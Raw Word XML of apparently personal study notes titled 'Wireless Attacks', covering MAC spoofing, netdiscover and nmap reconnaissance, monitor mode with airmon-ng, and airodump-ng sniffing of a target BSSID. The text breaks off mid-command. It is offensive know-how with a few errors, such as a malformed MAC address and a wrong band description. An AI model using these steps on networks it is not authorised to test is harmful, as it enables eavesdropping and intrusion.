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8D3B" w14:textId="342AA9DC" w:rsidR="009271BD" w:rsidRDefault="009271BD" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>WIRELESS ATTACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E553284" w14:textId="6D9C9D15" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020"/>
    <w:p w14:paraId="26C4C602" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t>Finding network interfaces with inet(IP) and ether(MAC) address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED0EF2" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRPr="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52633A0C" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020"/>
    <w:p w14:paraId="43B6B9EC" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Finding wireless interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54076B39" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRPr="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>iwconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4323E5" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020"/>
    <w:p w14:paraId="357FC546" w14:textId="685D100B" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Changing my MAC or ether address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFE7AC" w14:textId="4CAECCC0" w:rsidR="00AD7020" w:rsidRPr="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 1- disable the network interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig [network interface] down </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ifconfig wlan0 down</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66418C03" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 2- changing the mac or ether address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2771C6" w14:textId="68F1AD5A" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>ifconfig [network interface] hw [network interface hardware] [new MAC or ether address]</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A943A1A" w14:textId="7633686C" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ifconfig wlan0 hw ether 00:10:20:1002</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D39FBA2" w14:textId="4E7CEC64" w:rsidR="00377FB1" w:rsidRPr="00377FB1" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 – enable interface: </w:t>
      </w:r>
      <w:r w:rsidRPr="00377FB1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>ifconfig [network interface] up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00377FB1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ifconfig wlan0 up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976EC10" w14:textId="57DC9ED3" w:rsidR="00377FB1" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:t xml:space="preserve">Step 4 – check if the mac address changed: </w:t>
      </w:r>
      <w:r w:rsidRPr="00377FB1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5FB0A" w14:textId="486F8F8C" w:rsidR="00377FB1" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:t>NOTE: MAC address resets back to original after restarting computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16448CEE" w14:textId="77777777" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020"/>
    <w:p w14:paraId="5EDF4254" w14:textId="31E3B497" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Collecting information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36006F60" w14:textId="50CA83B7" w:rsidR="00AD7020" w:rsidRPr="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NETDISCOVER: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">netdiscover -r [range of ip addresses to sniff]  </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00377FB1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>netdiscover -r 192.188.19.1/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD8E11" w14:textId="4F75852E" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020">
      <w:r>
        <w:t xml:space="preserve">NMAP: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>zenmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>(the graphical interface of nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFF400" w14:textId="1FF635FB" w:rsidR="00AD7020" w:rsidRDefault="00AD7020" w:rsidP="00AD7020"/>
    <w:p w14:paraId="4381A8BD" w14:textId="77777777" w:rsidR="003E35C8" w:rsidRDefault="003E35C8" w:rsidP="00AD7020"/>
    <w:p w14:paraId="082E69A6" w14:textId="252A4607" w:rsidR="003E35C8" w:rsidRDefault="00377FB1" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Capturing all Packets on a wireless networks using an external wireless interface or wifi adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD3A4E" w14:textId="77777777" w:rsidR="00AE1E77" w:rsidRPr="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77"/>
    <w:p w14:paraId="16E14B9D" w14:textId="0B067585" w:rsidR="003E35C8" w:rsidRPr="003E35C8" w:rsidRDefault="003E35C8" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ENABLING MONITOR MODE ON EXTERNAL WIRELESS ADAPTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17870A9D" w14:textId="77777777" w:rsidR="00AF3A6D" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 1- Disable</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8">
        <w:t xml:space="preserve"> the external</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wireless interface</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8">
        <w:t xml:space="preserve"> being used to capture packets</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798ABC8B" w14:textId="77777777" w:rsidR="00AF3A6D" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">config </w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">[external wireless </w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> down</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4CE5B0" w14:textId="32AEDE16" w:rsidR="00377FB1" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>config wlan0 down</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D18F2CF" w14:textId="63151FEE" w:rsidR="00377FB1" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2 – (NOT MANDATORY BUT BETTER RESULTS) It kills everything that could hinder capturing packets (KILLS INTERNET ACCESS): </w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>airmon-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19197692" w14:textId="77777777" w:rsidR="00AF3A6D" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 3 – Change the mode of my external wireless interface being used to capture packets from Manage to Monitor in order to passively capture packets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24289F1A" w14:textId="77777777" w:rsidR="00AF3A6D" w:rsidRDefault="00377FB1" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>iwconfig [</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">external </w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">wireless </w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidR="003E35C8" w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>] mode monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76CF05" w14:textId="00E67524" w:rsidR="00377FB1" w:rsidRDefault="003E35C8" w:rsidP="00AD7020">
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>iwconfig wlan0 mode monitor</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4315C44F" w14:textId="5214C4A2" w:rsidR="003E35C8" w:rsidRDefault="003E35C8" w:rsidP="00AD7020">
      <w:r>
        <w:t xml:space="preserve">Step 4 – Reenable the external wireless interface: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig [external wireless </w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>] up</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="003E35C8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ifconfig wlan0 up</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA9E88" w14:textId="44FAB460" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CAPTURING PACKETS WITH PACKET SNIFFER USING AIRMON-NG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E532570" w14:textId="77777777" w:rsidR="00AF3A6D" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r w:rsidRPr="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">airodump-ng [external wireless </w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> in monitor mode]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AEDE0" w14:textId="46CFFF25" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="006879FC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>airodump-ng mon0</w:t>
      </w:r>
      <w:r>
        <w:t>} (displays details of wireless networks</w:t>
      </w:r>
      <w:r w:rsidR="00AF3A6D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C6EC2" w14:textId="17111A72" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77"/>
    <w:p w14:paraId="06303AD2" w14:textId="4BBF6C10" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>INTEPRETING THE DATA GOTTEN FROM PACKET SNIFFER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE54DE" w14:textId="22CAB84D" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>BSSID – Mac address of the target wireless network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D3837" w14:textId="134562C6" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>PWR – The signal strength (The higher the number the stronger the signal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB0CE2" w14:textId="31551B3D" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>Beacons – Frames telling all wireless devices of its existence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902B04E" w14:textId="3504A578" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>#Data, - Number of data packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CC35D" w14:textId="38DBC7E2" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>#/s – Number of data packets collected per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629006D6" w14:textId="65D49D32" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>CH – Channels where the wireless networks operate on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F75C3" w14:textId="2DEE27AE" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>MB – Maximum speed supported by the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24750505" w14:textId="2DCEAA47" w:rsidR="00AE1E77" w:rsidRDefault="00AE1E77" w:rsidP="00AE1E77">
      <w:r>
        <w:t>ENC – Encryption type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C673C42" w14:textId="7E2FA180" w:rsidR="00AE1E77" w:rsidRDefault="00321EEC" w:rsidP="00AE1E77">
      <w:r>
        <w:t>CIPHER- The type of cipher used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04539980" w14:textId="7EFC4D25" w:rsidR="00321EEC" w:rsidRDefault="00321EEC" w:rsidP="00AE1E77">
      <w:r>
        <w:t>AUTH- Authentication type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302887A4" w14:textId="7DBC2084" w:rsidR="00321EEC" w:rsidRDefault="00321EEC" w:rsidP="00AE1E77">
      <w:r>
        <w:t>ESSID – Name of network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35386C6D" w14:textId="068C81E0" w:rsidR="00C317E2" w:rsidRDefault="00C317E2" w:rsidP="00AE1E77">
      <w:r w:rsidRPr="00C317E2">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>NOTE</w:t>
      </w:r>
      <w:r>
        <w:t>: airodump-ng is limited to whether the external wireless adapter used in sniffing supports 5gigahertz. 2.4 and 5 Gigahertz networks are the only frequencies wifi networks use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575F20BA" w14:textId="77775BCE" w:rsidR="00C317E2" w:rsidRDefault="00C317E2" w:rsidP="00AE1E77"/>
    <w:p w14:paraId="3909DEAE" w14:textId="3003B032" w:rsidR="00C317E2" w:rsidRDefault="00C317E2" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Sniffing 5gigahertz frequency bands wireless networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A186334" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRDefault="00C317E2" w:rsidP="00C317E2">
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">airodump-ng - -band </w:t>
      </w:r>
      <w:r w:rsidR="006879FC" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>[a or abg]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> [external wireless </w:t>
      </w:r>
      <w:r w:rsidR="006879FC" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> in monitor mode]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3AF8" w14:textId="6AA6BFC9" w:rsidR="00C317E2" w:rsidRDefault="00C317E2" w:rsidP="00C317E2">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>airodump-ng - -band a mon0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">} (band </w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>a” is 5G detecting band</w:t>
      </w:r>
      <w:r w:rsidR="006879FC">
        <w:t>, band “abg” is a 4G and 5G band</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E22E446" w14:textId="5B9C32E9" w:rsidR="006879FC" w:rsidRDefault="006879FC" w:rsidP="00C317E2"/>
    <w:p w14:paraId="1259FA8D" w14:textId="7E406186" w:rsidR="006879FC" w:rsidRDefault="006879FC" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gathering more information about a specific wireless network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0496B" w14:textId="7B12A455" w:rsidR="00AF3A6D" w:rsidRPr="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00C317E2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a</w:t>
      </w:r>
      <w:r w:rsidR="006879FC" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>irodump-ng - -bssid [target bssid or MAC or ether address] - -channel [channel number]</w:t>
      </w:r>
      <w:r w:rsidR="00BD6321" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> [external wireless adapter name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA4320" w14:textId="3783D3C6" w:rsidR="006879FC" w:rsidRDefault="006879FC" w:rsidP="00C317E2">
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>airodump-ng - -bssid F8:23:B2:B9:50:A8</w:t>
      </w:r>
      <w:r w:rsidR="00AF3A6D" w:rsidRPr="00A1442C">
